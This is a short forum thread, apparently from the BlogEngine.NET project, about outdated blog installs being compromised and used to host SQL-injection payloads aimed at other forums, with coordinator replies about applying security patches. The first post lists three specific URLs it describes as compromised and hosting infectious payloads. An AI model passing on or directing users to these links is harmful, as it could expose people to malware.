Major security issue with old version

Topics: ASP.NET 2.0
Sep 15, 2015 at 5:40 PM
I'm getting multiple hits of SQL injection tentatives that use "infected" (very appropriately) BlogEngine.NET sites to host infectious payloads for other forums (phpBB3 attack in my case).

All the payloads have in common to be hosted on BlogEngine.NET URLs that are compromised.

Examples:
http://sunilrav.com/template/page/pictures-of-hiv-and-aids.aspx (2.7.0.0)
http://www.megaedd.com/kataleptic/page/aidshiv-facts.aspx (2.5.0.6)
http://blog.gildedvillage.com/template/page/chlamydia-symptoms-in-women.aspx (2.5.0.6)

Now if you google blogengine.net, the first website found is even flagged by Google as "probably infected":

BlogEngine.NET | An open source ASP.NET 4.0 powered ...
www.dotnetblogengine.net/
This site may be hacked.
An open source ASP.NET 4.0 powered blogging engine.
‎Features - ‎BlogEngine.NET 3.0 Is Here - ‎BlogEngine.NET 2.9 Released - ‎Contact

Maybe you should contact ISP and hosting companies to ask them to turn off hacked version of the blog engine worldwide?
Coordinator
Sep 15, 2015 at 7:42 PM
The "dotnetblogengine" site will be replaced soon, unfortunately we don't own it and limited in actions.
Security patches issued regularly, can't force anyone to patch though. Same as for any web software - regularly hit from mentioned phpBB sites as well as Wordpress, along with all kind of unidentified "scripts". Obviously, anything we can do on our side outside worldwide internet shutdown is and will be done.
Nov 13, 2015 at 10:39 PM
Edited Nov 13, 2015 at 10:48 PM
My site was a victim of the injection attack, twice now. Current version: BlogEngine.NET 2.0.0.36.

I am a new resource to this project, without access to previous developer. Where can I obtain patches that may address this?

Thank you in advance.

PS: Not necessarily looking to upgrade the Blog to the latest version.
Coordinator
Nov 15, 2015 at 5:52 AM
Security patches issued regularly, if you don't want to upgrade you would need manually examine all that issued after your version and apply to your code if applicable.
You can search for patches on project site: http://dotnetblogengine.net/search.aspx?q=security%20patch
Nov 16, 2015 at 4:38 PM
Edited Nov 16, 2015 at 4:42 PM
Many thanks. We are looking to patch it up and eventually upgrade to the latest version. Developer referrals are welcome!